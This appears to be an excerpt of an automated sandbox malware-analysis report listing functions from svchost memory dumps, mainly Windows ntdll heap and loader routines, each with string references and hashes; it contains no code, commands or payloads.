                                                                    • Instruction ID: e59a4751c5b4f8068db8e06b5ea877ea1a48c0706b3d4060e7ba87b01280271c
                                                                    • Opcode Fuzzy Hash: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                                                    • Instruction Fuzzy Hash: F7612436205B809FD721EB24CA44F67BBE8EF84714F190968F9558F391C735D845CB62
                                                                    Function 036E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                    • API String ID: 0-336120773
                                                                    • Opcode ID: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                                                    • Instruction ID: 426c4992b92e84d5824b540b06da6231e40f444e516b3efabb0d2fdf3307024e
                                                                    • Opcode Fuzzy Hash: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                                                    • Instruction Fuzzy Hash: B5310E35601610EFC711DBA8CC86F6BB7E8EF0B620F190049E412CF291D670ED88EA6D
                                                                    Function 03629148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                    • API String ID: 0-1391187441
                                                                    • Opcode ID: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                                                    • Instruction ID: 27b0681d14de7ffb4b75c89c2ab5c4fb49db492c8740b71d886c934b95bbfd05
                                                                    • Opcode Fuzzy Hash: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                                                    • Instruction Fuzzy Hash: 9531A236A00614AFCB11EB46C889F9EBFF8EF45B20F154165E915AB291D7B0E940CE64
                                                                    Function 03641F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                                                    • Instruction ID: 2b87858562040dfd1f8efb95449a41afca5c3133cba8ea5a978de2e7be60714c
                                                                    • Opcode Fuzzy Hash: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                                                    • Instruction Fuzzy Hash: F622EC70A007019FEB16DF28C594B7AFBF9EF06704F28849AE5568B382D771D882CB50
                                                                    Function 036317EC Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 0368F8AA
                                                                    • HEAP: , xrefs: 0368F8B7
                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0368F8CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: 7c7655c32f2ee4666ba6fe8c11d6f3ea5e885e3af16d870b81d27c4daf0758ed
                                                                    • Instruction ID: 8e4d3ed84aff9f855cf31b731c6ee16bc048e49048a9fff094f273e05898e81a
                                                                    • Opcode Fuzzy Hash: 7c7655c32f2ee4666ba6fe8c11d6f3ea5e885e3af16d870b81d27c4daf0758ed
                                                                    • Instruction Fuzzy Hash: 1F12AE70604655EFDB24EF24C580B76BBA1FF0A704F18869DE49A8F285D774E842CBA0
                                                                    Function 03640770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    • Opcode ID: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                                                    • Instruction ID: 14a6f40c8041341f98794048de3da69845a80a78d8b27170264774c1cda76ffc
                                                                    • Opcode Fuzzy Hash: c1320e1edd664823f12b0afff66126897848364d4b19cc6c3f51724909ef3457
                                                                    • Instruction Fuzzy Hash: 07F1BD34B00615DFEB15CF68CA94B6AF7B9FF45304F1881A9E6169B381D734E982CB90
                                                                    Function 0363B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                    • API String ID: 0-1145731471
                                                                    • Opcode ID: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                                                    • Instruction ID: 4d3635842fa835983afbde0054c7871ca6b72992b32a5e3b0982e684ff6a2a74
                                                                    • Opcode Fuzzy Hash: 962f23e4631cf13195801c3874ea54efabf73ca1a309c03576b347be8fa62831
                                                                    • Instruction Fuzzy Hash: 33B17D79A046049BDF25CF69CA80BAEB7BAFF45714F28456AE451EB380D730E841CB54
                                                                    Function 036B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                    • API String ID: 0-2391371766
                                                                    • Opcode ID: 94c4c664ea7516bd6e5c5bd2fb0d72579249d20bde89266fcd61e1f9253aa74f
                                                                    • Instruction ID: 9ae2f93c40edce4b68bb1aa1725d6f6a1a255c7e273d7999cc136a58f78e0942
                                                                    • Opcode Fuzzy Hash: 94c4c664ea7516bd6e5c5bd2fb0d72579249d20bde89266fcd61e1f9253aa74f
                                                                    • Instruction Fuzzy Hash: ADB1AD79604341AFD321EE54C994BABB7F8EB44710F65492EFA409B340D7B4E884CF96
                                                                    Function 03656962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                                                    • Instruction ID: 67d83b3aafe9440b28b48d9e8b053f5d2580256cd11e85f7bc82b7c2f3cab76b
                                                                    • Opcode Fuzzy Hash: 6eaac94c2d86865941c000d8e2cf0fb9b7a610240f0be2dc341e524717fb7e0f
                                                                    • Instruction Fuzzy Hash: 63C26F716083419FEB25CF24C981BABBBE9AF88754F08896EF989C7340D734D805CB52
                                                                    Function 0362A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
                                                                    • Instruction ID: b127d04e308e54e1e1d1517372de0b1c43529b133f3e8ea653b882cdbd0854b2
                                                                    • Opcode Fuzzy Hash: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
                                                                    • Instruction Fuzzy Hash: 17A1AE759116289BDB31EF64CC88BEAF7B8EF48700F1401E9E909A7250D7359E85CF64
                                                                    Function 036C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                    • API String ID: 0-318774311
                                                                    • Opcode ID: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                                                    • Instruction ID: 7e3ddfb15f758bfb57fe84025e1f13cf8b8262dfa62131c6d5f1621e9372199b
                                                                    • Opcode Fuzzy Hash: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                                                    • Instruction Fuzzy Hash: 2381AD79619380AFE311DF14C944B6AB7E8FF85750F28892DF9809B390E778D904CB66
                                                                    Function 00402910 Relevance: 4.0, Strings: 3, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$]:$`
                                                                    • API String ID: 0-1336488103
                                                                    • Opcode ID: 7cf45a3128276fa9861ed77c8ab491291ff694d5aebcd4074628be3b47e23d91
                                                                    • Instruction ID: 220fe8c1d240c66b2b02a7a9220b8a015da7966b8c3d4b6e91ccf3c4f09b359e
                                                                    • Opcode Fuzzy Hash: 7cf45a3128276fa9861ed77c8ab491291ff694d5aebcd4074628be3b47e23d91
                                                                    • Instruction Fuzzy Hash: BD51F771B005158BDF288D5DCA5856EB362EBD4314F24813FDC06EB3C1EA79AD118B84
                                                                    Function 0366909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$&$@
                                                                    • API String ID: 0-1537733988
                                                                    • Opcode ID: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                                                    • Instruction ID: 2a2ccd1cfe23d223016cc74ba0c8c4b6504665c8401736f8c002467b0c59ddd2
                                                                    • Opcode Fuzzy Hash: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                                                    • Instruction Fuzzy Hash: C871C1745087419FC714DF24C680A2BFBE9BF86758F14891DE8979B351C731D80ACB9A
                                                                    Function 0370B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0370B82A
                                                                    • GlobalizationUserSettings, xrefs: 0370B834
                                                                    • TargetNtPath, xrefs: 0370B82F
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                    • API String ID: 0-505981995
                                                                    • Opcode ID: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                                                    • Instruction ID: 19108d0a0309964dab8fc0c3a7c00fbdcbb10abc091f9bfb249c985efe4116cf
                                                                    • Opcode Fuzzy Hash: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                                                    • Instruction Fuzzy Hash: 33616F76D51229EBDB31EB54CC88B9AB7F8AB14714F0101E9A509AB290C774DF80CF94
                                                                    Function 0362F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0368E6C6
                                                                    • HEAP[%wZ]: , xrefs: 0368E6A6
                                                                    • HEAP: , xrefs: 0368E6B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                    • API String ID: 0-1340214556
                                                                    • Opcode ID: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                                                    • Instruction ID: a5376a3c1406178c61ae6691815ea3a972ce3b418ff9257a37480d5e1cf23467
                                                                    • Opcode Fuzzy Hash: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                                                    • Instruction Fuzzy Hash: CB51F335604B54EFD712EBA8C944BAAFBF8EF05300F0941A4E9418F792D779E951CB21
                                                                    Function 036DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 036DDC12
                                                                    • HEAP: , xrefs: 036DDC1F
                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 036DDC32
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                    • API String ID: 0-3815128232
                                                                    • Opcode ID: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                                                    • Instruction ID: e2e0cad41338870372b423a029cc99a66a253ce9193bc407400493f2810ebf9e
                                                                    • Opcode Fuzzy Hash: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                                                    • Instruction Fuzzy Hash: C55138B5A046508ED374FB2AC944772B7F5DF46248F09888EE4D28B285D2B5D843DB61
                                                                    Function 0366C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Failed to reallocate the system dirs string !, xrefs: 036A82D7
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 036A82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 036A82DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    • Opcode ID: 7ab5fb84f02a3372aca2004a741619f1d46da2f4b789f151944a9f7251e056c7
                                                                    • Instruction ID: b360cf84716fd48b47fa1f1ea973f7cffda89a53c94513d7bb956deb83898c0b
                                                                    • Opcode Fuzzy Hash: 7ab5fb84f02a3372aca2004a741619f1d46da2f4b789f151944a9f7251e056c7
                                                                    • Instruction Fuzzy Hash: C741D2B5644710ABC720FB68D944B5BBBE8EF49750F08892EF988DB350E774E8108B95
                                                                    Function 036616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 036A1B39
                                                                    • LdrpAllocateTls, xrefs: 036A1B40
                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 036A1B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                    • API String ID: 0-4274184382
                                                                    • Opcode ID: f0ffe6b0039a5e397ce3a4709f1b566266e5846a9202fce269022d74cd7569c3
                                                                    • Instruction ID: 0e6b3fa95e245f629c21fbb679521386f1262f1fb8696253639b508b5aefc277
                                                                    • Opcode Fuzzy Hash: f0ffe6b0039a5e397ce3a4709f1b566266e5846a9202fce269022d74cd7569c3
                                                                    • Instruction Fuzzy Hash: 814188B9A00608AFDB15DFA8C941AAEFBF5FF4A310F148119E506AB300E774AC00CB94
                                                                    Function 036EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036EC1C5
                                                                    • @, xrefs: 036EC1F1
                                                                    • PreferredUILanguages, xrefs: 036EC212
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                                                    • Instruction ID: 16b1770528690e25bf75558f5efef2665a49f11f4e129dd5f3fcf586549cc995
                                                                    • Opcode Fuzzy Hash: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                                                    • Instruction Fuzzy Hash: 64418076E01219EFDB11DBD4C991FEEB7B8AB04700F14406AEA05B7290D7749A48CB58
                                                                    Function 036C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                                                    • Instruction ID: d94733950ffe19fb7b61f30551103cbb0a40077397c0b82cb9caa2f4cc4d33ec
                                                                    • Opcode Fuzzy Hash: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                                                    • Instruction Fuzzy Hash: 4E41E275910388CBEB23DBA6C960BBDBBB8EF55340F28045DD841EF791DA398901CB14
                                                                    Function 036B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036B4888
                                                                    • LdrpCheckRedirection, xrefs: 036B488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 036B4899
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    • Opcode ID: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                                                    • Instruction ID: 6ded236eca08a572a5f2b8fc5a4ac22cc2535a90e5a0c99886313ba69f5eb555
                                                                    • Opcode Fuzzy Hash: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                                                    • Instruction Fuzzy Hash: 3141D732A007509FCB22CE6AD944AA6BBF9EF49650F09056DEC59DB353DB30D880CF91
                                                                    Function 036633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() passed the empty activation context data, xrefs: 036A29FE
                                                                    • Actx , xrefs: 036633AC
                                                                    • RtlCreateActivationContext, xrefs: 036A29F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                    • API String ID: 0-859632880
                                                                    • Opcode ID: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                                                    • Instruction ID: 72cdb6ae428f45c4bed7370226165ab3b6c4fe25471c16fbf783fbcb92778904
                                                                    • Opcode Fuzzy Hash: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                                                    • Instruction Fuzzy Hash: 293144366403019FDB26DE58C990B9AB7A4BF44750F288469EE059F3A2CB70DC41CBA0
                                                                    Function 03661607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpInitializeTls, xrefs: 036A1A47
                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 036A1A51
                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 036A1A40
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                    • API String ID: 0-931879808
                                                                    • Opcode ID: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                                                    • Instruction ID: 36935fc0e9a02787b3bea93ff2d28eb9fc2d26be417a951e71a556c775132e61
                                                                    • Opcode Fuzzy Hash: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                                                    • Instruction Fuzzy Hash: F9312835A00205ABEB20DB58C985F7AB6BCFB537A4F08446DE505FB280E7B4AE558790
                                                                    Function 03671270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0367127B
                                                                    • BuildLabEx, xrefs: 0367130F
                                                                    • @, xrefs: 036712A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 0-3051831665
                                                                    • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                    • Instruction ID: 4fd8307c7188cca98d1c06d6c092a7e7207332b4a941d40c4c93114e25f6681b
                                                                    • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                    • Instruction Fuzzy Hash: E131D17690061CAFCB11EFA5CC44EEEBBBDEB85720F50442AE915AB260E730DE05CB54
                                                                    Function 036B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 036B2104
                                                                    • LdrpInitializationFailure, xrefs: 036B20FA
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 036B20F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                                                    • Instruction ID: 0a4142e7039449d8c5900139c798d5195d42f4a2dcdf50c3be5e8e353acffa7e
                                                                    • Opcode Fuzzy Hash: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                                                    • Instruction Fuzzy Hash: C1F0FF34640308AFEA24EA4CCD62F9A7BA8EB40B14F080858F7006B281D2E4A9908A90
                                                                    Function 036403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                                                    • Instruction ID: 214483f5722da649fb4074724e93516d4d52ecaf632acc76270ae9f323894c15
                                                                    • Opcode Fuzzy Hash: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                                                    • Instruction Fuzzy Hash: DD714975E00249DFDB01DFA9D990BAEB7B8AF08304F154069E905AB351EB34ED41CB65
                                                                    Function 036D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
